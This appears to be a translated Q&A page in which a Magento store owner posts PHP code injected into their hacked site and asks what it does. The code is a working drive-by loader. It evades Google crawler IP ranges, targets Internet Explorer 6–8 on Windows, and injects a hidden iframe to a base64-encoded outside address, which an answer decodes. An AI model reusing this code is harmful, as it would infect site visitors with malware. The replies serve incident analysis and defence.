PHP Web应用程序(Magento)入侵;这个黑客代码做了什么?

时间:2011-06-13 18:06:03

标签: php security magento xss

我刚刚在我的Magento 1.3.2.4安装上被黑了。你能告诉我这段代码的目的是什么吗?

另外,如何阻止此问题以及如何发现漏洞?

谢谢

function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}


$ip=$_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];


$user_agent = $_SERVER["HTTP_USER_AGENT"];

$IP = $_SERVER['REMOTE_ADDR'].".log";

@mkdir('/tmp/Location/');

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if(!file_exists("/tmp/Location/{$IP}"))
{


if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)

{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
    preg_match("/MSIE 7.0/", $user_agent) OR
    preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';

touch ("/tmp/Location/{$IP}");

}}}}

5 个答案:

答案 0 :(得分:2)

它会创建一个iframe,将人们引导到另一个网站。 dfjgkbl变量包含URL的base64编码;如果你想知道它是什么,有网上base64解码器可用。我不会在此处粘贴它,因为URL可能包含基于其余代码的Windows病毒。

答案 1 :(得分:2)

只是一个友好的建议,如果你使用FileZilla作为FTP代理,它将保存的密码保存在xml文件中,你的电脑上可能有病毒可以连接到你的服务器并将其写入你的文件。还要检查您的CPanel并查找不是由您创建的FTP帐户。情况可能并非如此,只要检查一下。

答案 2 :(得分:0)

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

转到:

请勿点击(这是HACKER LINK)&gt;&gt;&gt;&gt; 129.121.38.102 /主页/索引。 PHP

黑客会创建您网站上所有内容的日志。

答案 3 :(得分:0)

我也遇到了与Total Commander类似的问题......病毒使用TC FTP帐户并完全改变了我的网站(Joomla CMS),并在几乎每个php文件中添加了类似的恶意代码。

答案 4 :(得分:0)

首先升级你的Magento,就像这个版本的旧版本一样。

您的黑客代码是我们每次都看到的通用php病毒代码,它是一种自动病毒,从您的PC到服务器或服务器 - 服务器

你也可以使用免费的插件,如:magefirewall来保护你的magento。

P.S Im其中一位开发人员

相关问题
最新问题